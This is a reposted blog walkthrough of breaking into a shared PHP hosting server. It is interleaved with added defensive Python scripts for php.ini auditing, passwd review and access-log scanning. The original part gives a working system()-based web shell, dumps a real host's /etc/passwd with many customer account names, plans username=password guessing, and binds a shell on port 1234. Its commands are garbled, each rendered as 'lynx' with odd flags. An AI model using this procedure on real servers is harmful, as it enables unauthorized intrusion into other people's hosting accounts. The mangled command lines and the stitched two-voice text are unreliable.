Building Security on Linux: Attacks via PHP Configuration Vulnerabilities (repost)

RegisterForBlog posted on 2007-09-19

  The problem with these sites lies mainly in allowing functions such as system() and exec(). Anyone familiar with PHP knows that these functions invoke system commands (although PHP scripts run through the web server only have nobody's permissions), and any ordinary user who signs up for a hosting space gets a locally writable area, which lets the user write a web shell program to execute commands. On these servers ordinary users cannot log in, i.e. nologin (no login shell; the administrator is not that "generous"!), so by using functions like system() and exec() one can bind a shell out~! This article uses a Huyi (虎翼網) () hosting space as the example (whether all of their servers have this flaw I don't know~ I only tested the server my space is on):
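The paragraph above identifies the two configuration facts the whole walkthrough depends on: command-execution functions are callable from customer scripts, and (since the shell below reads a bare `$cmd` variable) request parameters are turned into PHP variables by register_globals. The following Python script is an added example, not code from the original post or from the hosting provider; it parses a php.ini text and reports whether those settings are still in the exploitable state. The two ini samples are constructed, and the `open_basedir` path is a placeholder.

```python
"""Check a php.ini for the settings that let a system()/exec() web shell work.

Added example, not code from the original post. The ini text below is
constructed; parse_ini() handles the simple 'key = value' lines and ';' comments
that php.ini uses. The page's shell reads its command from a bare $cmd variable,
which only arrives from the request when register_globals is On.
"""

# Functions that hand a string to a shell or spawn a process. system() and
# exec() are the two the post names; the others are their PHP siblings.
EXEC_FUNCTIONS = {
    "system", "exec", "passthru", "shell_exec",
    "popen", "proc_open", "pcntl_exec",
}


def parse_ini(text):
    """Return {key: value} for 'key = value' lines; ignores ';' comments and [sections]."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # php.ini comments start with ';'
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def is_on(value):
    """php.ini accepts On/1/True/Yes as true."""
    return value.strip().lower() in {"on", "1", "true", "yes"}


def audit(ini_text):
    """Return a list of findings; an empty list means all three checks pass."""
    s = parse_ini(ini_text)
    disabled = {f.strip().lower() for f in s.get("disable_functions", "").split(",") if f.strip()}
    findings = []
    still_enabled = sorted(EXEC_FUNCTIONS - disabled)
    if still_enabled:
        findings.append("command execution still enabled: " + ", ".join(still_enabled))
    if is_on(s.get("register_globals", "Off")):
        findings.append("register_globals=On: request parameters become PHP variables ($cmd)")
    if not s.get("open_basedir"):
        findings.append("open_basedir unset: PHP file functions can read outside the site directory")
    return findings


# Constructed samples: a configuration like the one the post exploits, and a hardened one.
WEAK_INI = """\
[PHP]
register_globals = On
disable_functions =
"""

HARDENED_INI = """\
[PHP]
register_globals = Off
disable_functions = system,exec,passthru,shell_exec,popen,proc_open,pcntl_exec
open_basedir = "/home/xxxx/public_html:/tmp"  ; placeholder path; confine file access per site
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(name, audit(ini) or ["ok"])
```

Two caveats on the checks: `open_basedir` only constrains PHP's own file functions, so it would not have stopped the `cat /etc/passwd` run through system() here; only `disable_functions` (or not loading PHP for untrusted customers at all) closes that path. And the `$cmd` trick stopped working by default when PHP 4.2 shipped with register_globals off, but a shell rewritten to read `$_REQUEST['cmd']` needs no such help, so the function list is the check that matters.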

  1. First write a webshell (easy to do in PHP)

  <?php
  # shell.php3
  echo "<pre>";      # HTML tag lost in extraction; <pre> assumed
  system("$cmd");    # $cmd comes straight from the request via register_globals
  echo "</pre>";
  ?>

  2. Upload it to the hosting space

  3. Run it (the actual server is masked out)

  lynx (check how much permission we actually have)

  uid=171047(xxxx) gid=51(xxx) groups=51(xxx), 65534(nobody)

  root is really stingy!

  lynx -ras (check the system)

  FreeBSD xxx.51.net 3.3-RELEASE FreeBSD 3.3-RELEASE #11: Tue Mar 20 00:58:09 CST 2001 root@51.net:/usr/src/sys/compile/51NET i386

  lynx /etc/passwd (shadow is definitely out of reach)

  root:*:0:0:Charlie &:/root:/bin/csh

  toor:*:0:0:Bourne-again Superuser:/root:

  daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin

  operator:*:2:5:System &:/:/sbin/nologin

  bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin

  tty:*:107353:51:USER:/home/tty:/local/bin/null

  kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin

  games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin

  news:*:8:8:News Subsystem:/:/sbin/nologin

  man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin

  bind:*:53:53:Bind Sandbox:/:/sbin/nologin

  uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico

  xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin

  pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin

  ftp:*:70:70:FTP Daemon:/nonexistent:/sbin/nologin

  nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

  quotauser1:*:997:51:quotauser:/home/quotauser1:/sbin/nologin

  quotauser2:*:998:51:quotauser:/home/quotauser2:/sbin/nologin

  quotauser3:*:999:51:quotauser:/home/quotauser3:/sbin/nologin

  tian:*:1002:1002::/local/tian:/local/bin/ksh

  sysadmin:*:1001:1001:System Administrator:/local/sysadmin:/local/bin/ksh

  test2:*:9999:51::/home/test2:/local/bin/null

  xhjj:*:106200:51:USER:/home/xhjj:/sbin/nologin

  zhinan:*:106201:51:USER:/home/zhinan:/local/bin/null

  yes2:*:106202:51:USER:/home/yes2:/local/bin/null

  daboy:*:106203:51:USER:/home/daboy:/local/bin/null

  yesky:*:106204:51:USER:/home/yesky:/local/bin/null

  yesk:*:106205:51:USER:/home/yesk:/local/bin/null

  lnsyzzg:*:106206:51:USER:/home/lnsyzzg:/local/bin/null

  fog:*:106207:51:USER:/home/fog:/local/bin/null

  renshou:*:106208:51:USER:/home/renshou:/local/bin/null

  hilen:*:106209:51:USER:/home/hilen:/local/bin/null

  hapybird:*:106210:51:USER:/home/hapybird:/sbin/nologin

  xiewei:*:106211:51:USER:/home/xiewei:/sbin/nologin

  wwwer:*:106212:51:USER:/home/wwwer:/local/bin/null

  larry:*:106213:51:USER:/home/larry:/local/bin/null

  sunboys:*:106214:51:USER:/home/sunboys:/local/bin/null

  everydayyuki:*:106215:51:USER:/home/everydayyuki:/local/bin/null

  linguanxi:*:106216:51:USER:/home/linguanxi:/local/bin/null

  baobao:*:106217:51:USER:/home/baobao:/local/bin/null

  chaoshan:*:106218:51:USER:/home/chaoshan:/local/bin/null

  hrstudio:*:106219:51:USER:/home/hrstudio:/local/bin/null

  dengxian:*:106220:51:USER:/home/dengxian:/local/bin/null

  simonstone:*:106221:51:USER:/home/simonstone:/local/bin/null

  chenjian:*:106222:51:USER:/home/chenjian:/local/bin/null

  lvxiangml:*:106223:51:USER:/home/lvxiangml:/local/bin/null

  zzbxaxa:*:106224:51:USER:/home/zzbxaxa:/local/bin/null

  pc2000:*:106225:51:USER:/home/pc2000:/local/bin/null

  startexcel:*:106226:51:USER:/home/startexcel:/local/bin/null

  model:*:106227:51:USER:/home/model:/local/bin/null

  leogirl:*:106228:51:USER:/home/leogirl:/local/bin/null

  fohcn:*:106229:51:USER:/home/fohcn:/local/bin/null

  ljok:*:106230:51:USER:/home/ljok:/local/bin/null

  baorui:*:106231:51:USER:/home/baorui:/local/bin/null

  fky-jack:*:106232:51:USER:/home/fky-jack:/local/bin/null

  zhaowen:*:106233:51:USER:/home/zhaowen:/local/bin/null

  xiaojiaoya:*:106234:51:USER:/home/xiaojiaoya:/local/bin/null

  zyinter:*:106235:51:USER:/home/zyinter:/local/bin/null

  power:*:106236:51:USER:/home/power:/local/bin/null

  feefan:*:106237:51:USER:/home/feefan:/local/bin/null

  paradise:*:106238:51:USER:/home/paradise:/local/bin/null

  wulc:*:106239:51:USER:/home/wulc:/local/bin/null

  jcm:*:106240:51:USER:/home/jcm:/local/bin/null

  liangxiaom:*:106241:51:USER:/home/liangxiaom:/local/bin/null

  jingder:*:106242:51:USER:/home/jingder:/local/bin/null

  hanjun:*:106243:51:USER:/home/hanjun:/local/bin/null

  adai:*:106244:51:USER:/home/adai:/local/bin/null

  fightben:*:106245:51:USER:/home/fightben:/local/bin/null

  lihonghui-ooo:*:106246:51:USER:/home/lihonghui-ooo:/local/bin/null

  xeno:*:106247:51:USER:/home/xeno:/local/bin/null

  ..................(too many~ omitted)

  Only a few users have a shell and can log in; cp it to my directory, and later split out the usernames to see whether anyone has username=passwd~ hehe~
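The observation in the line above, that only a handful of accounts have a real shell, is the same one an administrator makes when auditing a passwd file, from the other side: hosting accounts should stay on a nologin shell, and nothing besides root and toor should carry uid 0. The Python below is an added example, not part of the original post; its sample listing mirrors a few system entries from the dump above and adds two constructed customer accounts (`cust1`, `cust2`).

```python
"""Find which accounts in a passwd listing can log in interactively.

Added example, not part of the original post. The listing below is constructed
in the format of the dump above ('*' in the password field because FreeBSD keeps
the hashes in master.passwd). An empty shell field is not "no shell": login(1)
falls back to /bin/sh, so it is treated as such here.
"""
from collections import namedtuple, Counter

PasswdEntry = namedtuple("PasswdEntry", "name passwd uid gid gecos home shell")

# Shells that refuse an interactive login. /local/bin/null is the non-standard
# placeholder the server in the post uses for hosting customers.
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/local/bin/null"}


def parse_passwd(text):
    """Parse passwd(5) lines; an empty shell field means the system default, /bin/sh."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("malformed passwd line: %r" % line)
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, passwd, int(uid), int(gid), gecos, home, shell or "/bin/sh"))
    return entries


def login_capable(entries):
    """Accounts whose shell is not one of the known nologin placeholders."""
    return [e.name for e in entries if e.shell not in NOLOGIN_SHELLS]


def superusers(entries):
    """Every account with uid 0, however it is named."""
    return [e.name for e in entries if e.uid == 0]


def shell_histogram(entries):
    """How many accounts use each shell; an unexpected shell stands out here."""
    return Counter(e.shell for e in entries)


# Constructed sample: system entries as in the dump above plus two customer accounts.
SAMPLE_PASSWD = """\
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
sysadmin:*:1001:1001:System Administrator:/local/sysadmin:/local/bin/ksh
cust1:*:106200:51:USER:/home/cust1:/sbin/nologin
cust2:*:106201:51:USER:/home/cust2:/local/bin/null
"""

if __name__ == "__main__":
    entries = parse_passwd(SAMPLE_PASSWD)
    print("login-capable:", login_capable(entries))
    print("uid 0:", superusers(entries))
    print("shells:", dict(shell_histogram(entries)))
```

Note that `uucp` is reported as login-capable: its "shell" is uucico, which is not a nologin placeholder, which is exactly the kind of entry worth a second look in an audit. Whether a login-capable account is actually usable also depends on its password hash in master.passwd, which this file cannot show.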

  lynx

  HOME=/

  PS1=$

  OPTIND=1

  PS2=>

  PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin

  IFS=

  What a poor "environment", set up like this....

  lynx /etc/hosts

  # $FreeBSD: src/etc/hosts,v 1.9.2.1 1999/08/29 14:18:44 peter Exp $

  #

  # Host Database

  # This file should contain the addresses and aliases

  # for local hosts that share this file.

  # In the presence of the domain name service or NIS, this file may

  # not be consulted at all; see /etc/host.conf for the resolution order.

  #

  #

  127.0.0.1 localhost localhost.my.domain myname.my.domain

  #

  # Imaginary network.

  #10.0.0.2 myname.my.domain myname

  #10.0.0.3 myfriend.my.domain myfriend

  #

  # According to RFC 1918, you can use the following IP networks for

  # private nets which will never be connected to the Internet:

  #

  # 10.0.0.0 - 10.255.255.255

  # 172.16.0.0 - 172.31.255.255

  # 192.168.0.0 - 192.168.255.255

  #

  #

  Not that small, eh~ the hosts file ~

  lynx -b gcc

  (heaven help us~ there is gcc)

  gcc:/usr/sbin/gcc (hooray!!!!!!!!!!!!)

  Let me try~ push a big one up and compile it, haha~ so fast!

  The webshell is too tiring; binding a shell out is more convenient... (upload a bindshell program; you can also write one yourself in perl/C, neither is hard)

  lynx -o bind bindshell.c

  lynx 1234

  bind shell too port 1234

  telnet xxx.51.net 1234

  .....the rest is omitted; anyway, commands can be executed now
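Everything from step 3 up to this point was driven through HTTP GET requests to the uploaded script, so the web server's access log holds a complete record of each command that was run. The Python below is an added example, not code from the original post; it parses Apache common-log lines, URL-decodes every query parameter and flags values that look like shell commands. The log lines are constructed to mirror the sequence above, with two benign requests from a second address mixed in; the client addresses, timestamps and user agents are made up.

```python
"""Flag web-server requests that carry a shell command in a query parameter.

Added example, not part of the original post. The parameter name is not assumed:
every query value is checked, so a shell that calls its parameter something other
than cmd= is caught the same way. parse_qsl() performs the %-decoding, so
'cat%20/etc/passwd' and 'gcc+-o+bind' are examined in their decoded form.
"""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache common log format: ip ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Commands a web application would not normally receive as a parameter value.
COMMAND_NAMES = {
    "id", "uname", "cat", "ls", "pwd", "env", "set", "gcc", "cc", "make",
    "wget", "curl", "nc", "telnet", "perl", "sh", "bash", "rpcinfo",
}
SHELL_META = re.compile(r"[;|`]|\$\(|&&")


def classify_value(value):
    """Return a reason string if the value looks like a shell command, else None."""
    value = value.strip()
    if not value:
        return None
    first = value.split()[0]
    basename = first.rsplit("/", 1)[-1]  # /usr/bin/id and id are the same command
    if basename in COMMAND_NAMES or first.startswith("./"):
        return "command name: " + first
    if SHELL_META.search(value):
        return "shell metacharacters"
    return None


def scan_access_log(lines):
    """Return one hit per suspicious query parameter: (ip, path, param, value, reason)."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a common-log line; skip rather than guess
        url = urlsplit(m.group("target"))
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            reason = classify_value(value)
            if reason:
                hits.append((m.group("ip"), url.path, param, value, reason))
    return hits


def hits_per_source(hits):
    """Count hits per client address; a run of hits from one address is the tell-tale."""
    return Counter(h[0] for h in hits)


# Constructed log lines mirroring the sequence in the post; addresses and agents are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Mar/2001:01:12:03 +0800] "GET /shell.php3?cmd=id HTTP/1.0" 200 87 "-" "Lynx/2.8.3"
192.0.2.9 - - [20/Mar/2001:01:12:21 +0800] "GET /index.php3?page=news HTTP/1.0" 200 4102 "-" "Mozilla/4.7"
10.0.0.5 - - [20/Mar/2001:01:12:40 +0800] "GET /shell.php3?cmd=cat%20/etc/passwd HTTP/1.0" 200 5120 "-" "Lynx/2.8.3"
10.0.0.5 - - [20/Mar/2001:01:15:02 +0800] "GET /shell.php3?cmd=gcc+-o+bind+bindshell.c HTTP/1.0" 200 12 "-" "Lynx/2.8.3"
10.0.0.5 - - [20/Mar/2001:01:15:30 +0800] "GET /shell.php3?cmd=./bind%201234 HTTP/1.0" 200 31 "-" "Lynx/2.8.3"
192.0.2.9 - - [20/Mar/2001:01:16:00 +0800] "GET /search.php3?q=php+hosting HTTP/1.0" 200 2200 "-" "Mozilla/4.7"
"""

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print(hit)
    print(hits_per_source(scan_access_log(SAMPLE_LOG.splitlines())))
```

Treat hits as triage leads rather than verdicts: a search box receiving the word "cat" matches too, so weight repeated hits from one address and hits against scripts the site does not normally serve. The scan also sees only what the log records; a shell driven by POST bodies leaves nothing in the query string, which is why the php.ini controls, not log review, are the primary defence on a shared host.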

  Hmm~ it seems this box has no MySQL installed, a pity~ hehe~~~~~~~~~. Oh right, the one at oso.com.cn seems to have it~, but it was shut down recently.....

  lynx -p

  localhost

  portmapper 100000 portmap sunrpc

  rstatd 100001 rstat rstat_svc rup perfmeter

  rusersd 100002 rusers

  nfs 100003 nfsprog

  ypserv 100004 ypprog

  mountd 100005 mount showmount

  ypbind 100007

  walld 100008 rwall shutdown

  yppasswdd 100009 yppasswd

  etherstatd 100010 etherstat

  rquotad 100011 rquotaprog quota rquota

  sprayd 100012 spray

  3270_mapper 100013

  rje_ma

  


From "ITPUB Blog", link: http://blog.itpub.net/10763080/viewspace-970146/. If reposting, please cite the source; otherwise legal responsibility will be pursued.
